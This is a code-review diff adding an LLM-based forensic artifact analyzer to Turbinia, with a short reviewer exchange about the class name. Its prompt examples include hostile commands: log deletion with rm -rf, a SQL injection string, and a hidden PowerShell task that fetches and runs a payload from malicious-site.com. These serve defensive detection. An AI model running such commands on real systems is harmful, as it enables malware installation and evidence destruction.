turbinia/workers/analysis/llm_analyzer.py

```diff
@@ -0,0 +1,216 @@
+from turbinia import config as turbinia_config
+from turbinia import workers
+
+CONTEXT_PROMPT = """
+I'm a security engineer investigating a potential cybersecurity incident and need your help analyzing 
+a forensics artifact. I'll provide the artifact separately. Focus on identifying concerning security 
+findings. A security finding can be any of:
+
+* **Vulnerable Configurations:** Settings that create weaknesses attackers could exploit (e.g., Docker daemon allowing anonymous connections)
+* **Suspicious Activity:**  Entries that seem unusual, malformed, or could indicate malicious behavior, for example:
+    * **Persistence:** Attempts to establish a foothold on the system (e.g., modifying startup scripts).
+    * **Malware Installation:**  Downloading and executing suspicious executables
+    * **Command and Control Communication:**  Reaching out to external servers known for malicious activity.
+
+** IMPORTANT** Your response should only include details about findings. If no findings reply 
+with no security findings found. Response should be brief, short and related to a finding.
+"""
+REQUEST_PROMPT = """
+**Artifact Name:** {artifact_name}
+
+Please analyze this artifact based on the instructions from the previous prompt. For each finding, briefly provide:
+
+* **What:** A concise description.
+* **Why:** A short explanation of the potential security risk. 
+
+**Examples of findings:**
+* **Bash History:** `rm -rf /var/log` (Attempts to delete critical log files)
+* **SSH Logs:** 
+    * Successful login for ‘root’ from infrequent IP address 203.0.113.1 
+    * Successful login for 'webadmin' after 5 failed attempts from IP 123.45.67.89 
+* **Web Server Logs:**  GET requests with SQL injection patterns like `/products?id=1; DROP TABLE users`
+* **Sudoers File:**  `web_team ALL=(ALL:ALL) NOPASSWD: ALL` (Excessive privileges)
+* **Apache Config:** `Options +FollowSymLinks` (Potential directory traversal risk)
+* **Unexpected Scheduled Tasks:** `schtasks /create /tn "WindowsUpdates" /tr "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')" /sc daily /st 02:00` (downloading malware)
+* **Firewall Config:**  `ACCEPT INPUT from 0.0.0.0/0 to any port 22` (SSH open to the world)
+* **Password file:**  `admin:admin123` (Simple, default password)
+* **SNMP Config:** Community string 'public' (Easily guessable)
+* **Web App Config:**  Debug mode enabled in production  
+"""
+CONTENT_PROMPT = """
+"**Artifact Content (Part {i} of {chunks_len}):** \n```\n{chunk}\n```"
+"""
+PRIORITY_PROMPT = """
+Please set the severity of the security findings, your response must be a single word from the following list: [LOW, MEDIUM, HIGH, CRITICAL]
+
+**Examples answer:**
+CRITICAL
+"""
+SUMMARY_PROMPT = """
+Please summarize all security findings in a single statement, keep summary short and don't describe the summary
+"""
+
+
+class LLMAnalyzerTask(workers.TurbiniaTask):
```

Comment:
In my mind the LLM is a tool, and we would have more descriptive analyzers, something like:
`ConfigFileAnalyzer`

`LLMAnalyzerTask` seems a little broad :)

Reply:
it works for config, log/history files, I am thinking to make it LLMArtifactsAnalyzer